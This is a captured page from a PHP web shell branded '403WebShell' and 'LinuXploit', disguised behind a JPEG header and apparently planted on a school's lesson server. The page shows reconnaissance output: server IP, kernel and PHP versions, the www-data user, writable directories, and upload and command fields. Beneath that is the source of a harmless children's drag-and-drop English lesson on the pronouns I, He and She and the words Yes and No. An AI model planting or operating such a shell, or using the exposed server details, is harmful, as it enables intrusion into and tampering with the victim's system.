????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.118.162.243
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old/Html/LevelB/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old/Html/LevelB/Category1/LevelBCat1Lesson7.html
<!doctype html>
<html>
    <head>        
        <title>Fill in the blanks with I, Yes, He, She and No.</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>

        <style type="text/css">

            .style_Td
            {
                text-align:center;
                font-size: 24px;
                font-family: "Arial Rounded MT Bold";
                color: red;
            }
        
            .style_table_padding
            {
                padding-top: 0px;
                padding-bottom: 0px;
            }

            .style_Options
            {
                padding-left: 10px;
                padding-top: 0px;
                padding-bottom: 0px;
                padding-right: 0px;
                text-align: left;
                font-size: 24px;
                font-family: "Arial Rounded MT Bold";
                font-weight: bold;
                color: blue;
            }

            .style_HeadLineText
            {
                padding-left: 10px;
                text-align: left;
                font-size: 24px;
                font-family: "Arial Rounded MT Bold";
                font-weight: bold;
                color: black;
            }
        
            .style_borderNone
            {
                border:none;
                border-collapse:collapse;
            }
        
            .style_text_blue
            {
                color: #0F23DB;
                font-size: 20px;
                font-weight:bold;
                font-family: 'Arial Rounded MT Bold';
            }

        </style>

        <script>
            function page_preLoad()
            {
                setPageImages();
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.B, Category.No1, 7), true, true);
                shared_setFooterTable('id_tblFooter', true, true, false, true, true);
                
                shared_hideAllExceptFirstElement('id_SpanWordI', 2);
                shared_hideAllExceptFirstElement('id_SpanWordYes', 4);
                shared_hideAllExceptFirstElement('id_SpanWordHe', 2);
                shared_hideAllExceptFirstElement('id_SpanWordShe', 3);
                shared_hideAllExceptFirstElement('id_SpanWordNo', 4);
            }
        
            function page_onLoad()
            {
                shared_set_debugInfo(Level.B, Category.No1);
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
            }

            function setPageImages()
            {
                var imagePath = '../../../img/LevelB/Category1/LevelBCat1Lesson7/';
                
                shared_setImageSource('id_img_boy1', imagePath, 'boy.png');
                shared_setImageSource('id_img_boy2', imagePath, 'boy.png');
                shared_setImageSource('id_img_girl1', imagePath, 'girl.png');
                shared_setImageSource('id_img_girl2', imagePath, 'girl.png');
            }
        
            function btnPrevious_click()
            {
                window.location = "LevelBCat1Lesson6.html";
            }

            function btnNext_click()
            {
                window.location = "LevelBCat1Lesson8.html";
            }        
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelB');
            }

            function btnLevel_click(levelName)
            {
                var urlString = "Lessons.html?" + levelName;

                var urlEncoded = encodeURI(urlString);

                window.location = urlEncoded;
            }
        
            function DragDrop(id_dropBox, text)
            {
                shared_setTextAndBackgroundColorToGreenByTrimmingText(shared_currentDropingId, id_dropBox);

                if (text == 'I')
                {
                    showNextIWord();
                }
                else if (text == 'He')
                {
                    showNextHeWord();
                }
                else if (text == 'She')
                {
                    showNextSheWord();
                }
                else if (text == 'YesOrNo')
                {
                    showNextYesOrNoWord();
                }
                
                isAllInfosMovedShowClapsAnimation();
            }
        
            function showNextIWord()
            {
                shared_unHideNextElement('id_SpanWordI', 2);
            }
            
            function showNextHeWord()
            {
                shared_unHideNextElement('id_SpanWordHe', 2);
            }
        
            function showNextSheWord()
            {
                shared_unHideNextElement('id_SpanWordShe', 3);
            }
        
            function showNextYesOrNoWord()
            {
                var prefix = shared_currentDropingId.substring(0, shared_currentDropingId.length - 1);
                var suffix = shared_currentDropingId.substring(shared_currentDropingId.length - 1);
             
                shared_unHideNextElement(prefix, 4);
            }
                         
            function isAllInfosMovedShowClapsAnimation()
            {
                var allElementIdsArray = ['id_SpanWordI1', 'id_SpanWordI2', 'id_SpanWordYes1','id_SpanWordYes2', 'id_SpanWordYes3', 'id_SpanWordYes4', 'id_SpanWordHe1', 'id_SpanWordHe2', 'id_SpanWordShe1', 'id_SpanWordShe2', 'id_SpanWordShe3', 'id_SpanWordNo1', 'id_SpanWordNo2', 'id_SpanWordNo3', 'id_SpanWordNo4'];
                
                var nElementsMoved = 0;
                
                for (index=0; index<allElementIdsArray.length; index++)
                {
                    var eElement = document.getElementById(allElementIdsArray[index]);
                    
                    if (eElement.isMoved == true)
                    {
                        nElementsMoved++;
                    }
                }
                
                if ((allElementIdsArray.length - nElementsMoved) <= 4)
                {
                    
                    shared_show_claps_animation('shared_id_div_claps_image');
                }
            }
        
        </script>
    </head>

    <body onload="page_onLoad()">
        
    <div id="shared_id_div_claps_image">
    </div>
        
    <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
        <tr height="5%">
            <td>
                <header height="100%">
                    <div id="id_tblHeader" align="center"></div>
                </header>
            </td>
        </tr>
        <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
            <td>
                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="5">
                    <tr>
                        <td>
                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                  <tr height="5%">
                                      <td class="style_borderNone">
                                          <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="5" >
                                              <tr>
                                                  <td width="100%" class="shared_style_text1 style_borderNone">
                                                      <u>Fill the blanks with the following words: </u>
                                                  </td>
                                              </tr>
                                          </table>
                                      </td>                    
                                  </tr>
                                  <tr height="*">
                                    <td>
                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                          <tr height="100%">
                                            <td>
                                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                  <tr height="7%">
                                                    <td style="border-top: 0px; border-left: 0px; border-right: 0px">
                                                        <table id="id_tblOptionsSet3" border="0"  width="100%" height="100%" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td width="*" class="shared_style_text1">Options:</td>
                                                                <td class="shared_style_blue" width="4%"><span id="id_SpanWordI1" class="cls_SpanWordI1">I</span></td>
                                                                <td class="shared_style_blue" width="7%"><span id="id_SpanWordYes1" class="cls_SpanWordYes1">Yes</span></td>
                                                                <td class="shared_style_blue" width="6%"><span id="id_SpanWordHe1" class="cls_SpanWordHe1">He</span></td>
                                                                <td class="shared_style_blue" width="7%"><span id="id_SpanWordShe1" class="cls_SpanWordShe1">She</span></td>
                                                                <td class="shared_style_blue" width="5%"><span id="id_SpanWordNo1" class="cls_SpanWordNo1">No</span></td>
                                                                <td class="shared_style_blue" width="7%"><span id="id_SpanWordShe2" class="cls_SpanWordShe2">She</span></td>
                                                                <td class="shared_style_blue" width="5%"><span id="id_SpanWordHe2" class="cls_SpanWordHe2">He</span></td>
                                                                <td class="shared_style_blue" width="7%"><span id="id_SpanWordShe3" class="cls_SpanWordShe3">She</span></td>
                                                                <td class="shared_style_blue" width="4%"><span id="id_SpanWordI2" class="cls_SpanWordI2">I</span></td>
                                                                <td class="shared_style_blue" width="6%"><span id="id_SpanWordYes2" class="cls_SpanWordYes2">Yes</span></td>
                                                                <td class="shared_style_blue" width="5%"><span id="id_SpanWordNo2" class="cls_SpanWordNo2">No</span></td>
                                                                <td class="shared_style_blue" width="6%"><span id="id_SpanWordYes3" class="cls_SpanWordYes3">Yes</span></td>
                                                                <td class="shared_style_blue" width="5%"><span id="id_SpanWordNo3" class="cls_SpanWordNo3">No</span></td>
                                                                <td class="shared_style_blue" width="6%"><span id="id_SpanWordYes4" class="cls_SpanWordYes4">Yes</span></td>
                                                                <td class="shared_style_blue" width="5%"><span id="id_SpanWordNo4" class="cls_SpanWordNo4">No</span></td>
                                                          </tr>
                                                        </table>
                                                    </td>
                                                  </tr>
                                                  <tr height="*">
                                                    <td style="border-left: 0px; border-right: 0px">
                                                        <table width="100%" height="100%"  border = "0" cellspacing="5" cellpadding="0">
                                                          <tr height="10%">
                                                            <td width = "100%">
                                                                <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="2" cellpadding="0">
                                                                    <tr>
                                                                        <td width = "20%" class="style_text_blue" align="right">1. </td>
                                                                        <td id="id_TdSpanWordHe1Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                        <td width = "20%" class="style_text_blue">is a boy.</td>
                                                                        <td width="*">
                                                                            <img id="id_img_boy1" width="20%" height="90%"/>
                                                                        </td>
                                                                    </tr>
                                                                </table>
                                                            </td>
                                                          </tr>
                                                          <tr height="10%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="2" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">2. </td>
                                                                          <td id="id_TdSpanWordShe1Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "20%" class="style_text_blue">is a girl.</td>
                                                                          <td width="*">
                                                                              <img id="id_img_girl1" width="20%" height="90%"/>
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="10%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">3. </td>
                                                                          <td id="" width="30%" class="style_text_blue">Is he a boy?</td>
                                                                          <td width="*">
                                                                              <img id="id_img_boy2" width="20%" height="90%"/>
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "25%" class="style_text_blue" align="right">Yes. </td>
                                                                          <td id="id_TdSpanWordHe2Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "*" class="style_text_blue">is a boy.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="10%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">4. </td>
                                                                          <td id="id_TdSpanWordHe1Box" width="30%" class="style_text_blue">Is she a girl?</td>
                                                                          <td width="*">
                                                                              <img id="id_img_girl2" width="20%" height="90%"/>
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="1" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "25%" class="style_text_blue" align="right">Yes. </td>
                                                                          <td id="id_TdSpanWordShe2Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "*" class="style_text_blue">is a girl.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="1" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">5. </td>
                                                                          <td id="id_TdSpanWordI1Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "*" class="style_text_blue">am a boy/girl.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">6. </td>
                                                                          <td width = "20%" class="style_text_blue">My name is</td>
                                                                          <td width="*" class="style_text_blue" align="left">
                                                                              <input type="text" class="shared_style_options_red" style="width: 40%; text-align:center">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">7. </td>
                                                                          <td width = "*" class="style_text_blue">Are you in Level-B class?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right"></td>
                                                                          <td id="id_TdSpanWordYesOrNo1Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "*" class="style_text_blue">.&nbsp;&nbsp;Iam in Level-B class.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">8. </td>
                                                                          <td width = "*" class="style_text_blue">Are you studying in Shraddha School?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right"></td>
                                                                          <td id="id_TdSpanWordYesOrNo2Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "*" class="style_text_blue">.&nbsp;&nbsp;Iam studying in Shraddha school.</td>
                                                                      </tr>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">9. </td>
                                                                          <td width = "*" class="style_text_blue">Is she your teacher?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right"></td>
                                                                          <td id="id_TdSpanWordYesOrNo3Box" width="10%" class="shared_style_blue" align="center">____</td><td width = "2%" class="style_text_blue">.</td>
                                                                          <td id="id_TdSpanWordShe3Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "*" class="style_text_blue"> is my teacher.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="5%">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right">10. </td>
                                                                          <td width = "*" class="style_text_blue">Do tou like your teacher?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="*">
                                                              <td width = "100%">
                                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td width = "20%" class="style_text_blue" align="right"></td>
                                                                          <td id="id_TdSpanWordYesOrNo4Box" width="10%" class="shared_style_blue" align="center">____</td><td width = "2%" class="style_text_blue">.</td>
                                                                          <td id="id_TdSpanWordI2Box" width="10%" class="shared_style_blue" align="center">____</td>
                                                                          <td width = "*" class="style_text_blue"> like my teacher.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                        </table>
                                                     </td>
                                                  </tr>
                                                </table>
                                            </td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                            </table>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
        <tr height="5%">
            <td>
                <footer height="100%">
                    <div id="id_tblFooter" align="center"></div>
                </footer>
            </td>
        </tr>
    </table>

    <script>
            page_preLoad();
            
            new webkit_draggable('id_SpanWordI1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordI1'}});
            new webkit_draggable('id_SpanWordI2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordI2'}});
            
            new webkit_draggable('id_SpanWordYes1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordYes1'}});
            new webkit_draggable('id_SpanWordYes2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordYes2'}});
            new webkit_draggable('id_SpanWordYes3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordYes3'}});
            new webkit_draggable('id_SpanWordYes4', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordYes4'}});
            
            new webkit_draggable('id_SpanWordHe1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordHe1'}});
            new webkit_draggable('id_SpanWordHe2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordHe2'}});
            
            new webkit_draggable('id_SpanWordShe1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordShe1'}});
            new webkit_draggable('id_SpanWordShe2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordShe2'}});
            new webkit_draggable('id_SpanWordShe3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordShe3'}});
            
            new webkit_draggable('id_SpanWordNo1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordNo1'}});
            new webkit_draggable('id_SpanWordNo2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordNo2'}});
            new webkit_draggable('id_SpanWordNo3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordNo3'}});
            new webkit_draggable('id_SpanWordNo4', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordNo4'}});

            webkit_drop.add('id_TdSpanWordI1Box', {accept:["cls_SpanWordI1", "cls_SpanWordI2"], onDrop : function(){DragDrop('id_TdSpanWordI1Box', 'I')}});
            webkit_drop.add('id_TdSpanWordI2Box', {accept:["cls_SpanWordI1", "cls_SpanWordI2"], onDrop : function(){DragDrop('id_TdSpanWordI2Box', 'I')}});
            
            webkit_drop.add('id_TdSpanWordYesOrNo1Box', {accept:["cls_SpanWordYes1", "cls_SpanWordYes2", "cls_SpanWordYes3", "cls_SpanWordYes4", "cls_SpanWordNo1", "cls_SpanWordNo2", "cls_SpanWordNo3", "cls_SpanWordNo4"], onDrop : function(){DragDrop('id_TdSpanWordYesOrNo1Box', 'YesOrNo')}});
            webkit_drop.add('id_TdSpanWordYesOrNo2Box', {accept:["cls_SpanWordYes1", "cls_SpanWordYes2", "cls_SpanWordYes3", "cls_SpanWordYes4", "cls_SpanWordNo1", "cls_SpanWordNo2", "cls_SpanWordNo3", "cls_SpanWordNo4"], onDrop : function(){DragDrop('id_TdSpanWordYesOrNo2Box', 'YesOrNo')}});
            webkit_drop.add('id_TdSpanWordYesOrNo3Box', {accept:["cls_SpanWordYes1", "cls_SpanWordYes2", "cls_SpanWordYes3", "cls_SpanWordYes4", "cls_SpanWordNo1", "cls_SpanWordNo2", "cls_SpanWordNo3", "cls_SpanWordNo4"], onDrop : function(){DragDrop('id_TdSpanWordYesOrNo3Box', 'YesOrNo')}});
            webkit_drop.add('id_TdSpanWordYesOrNo4Box', {accept:["cls_SpanWordYes1", "cls_SpanWordYes2", "cls_SpanWordYes3", "cls_SpanWordYes4", "cls_SpanWordNo1", "cls_SpanWordNo2", "cls_SpanWordNo3", "cls_SpanWordNo4"], onDrop : function(){DragDrop('id_TdSpanWordYesOrNo4Box', 'YesOrNo')}});
            
            
            webkit_drop.add('id_TdSpanWordHe1Box', {accept:["cls_SpanWordHe1", "cls_SpanWordHe2"], onDrop : function(){DragDrop('id_TdSpanWordHe1Box', 'He')}});
            webkit_drop.add('id_TdSpanWordHe2Box', {accept:["cls_SpanWordHe1", "cls_SpanWordHe2"], onDrop : function(){DragDrop('id_TdSpanWordHe2Box', 'He')}});
            
            webkit_drop.add('id_TdSpanWordShe1Box', {accept:["cls_SpanWordShe1", "cls_SpanWordShe2", "cls_SpanWordShe3"], onDrop : function(){DragDrop('id_TdSpanWordShe1Box', 'She')}});
            webkit_drop.add('id_TdSpanWordShe2Box', {accept:["cls_SpanWordShe1", "cls_SpanWordShe2", "cls_SpanWordShe3"], onDrop : function(){DragDrop('id_TdSpanWordShe2Box', 'She')}});
            webkit_drop.add('id_TdSpanWordShe3Box', {accept:["cls_SpanWordShe1", "cls_SpanWordShe2", "cls_SpanWordShe3"], onDrop : function(){DragDrop('id_TdSpanWordShe3Box', 'She')}});
            
            
            
        </script>

    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit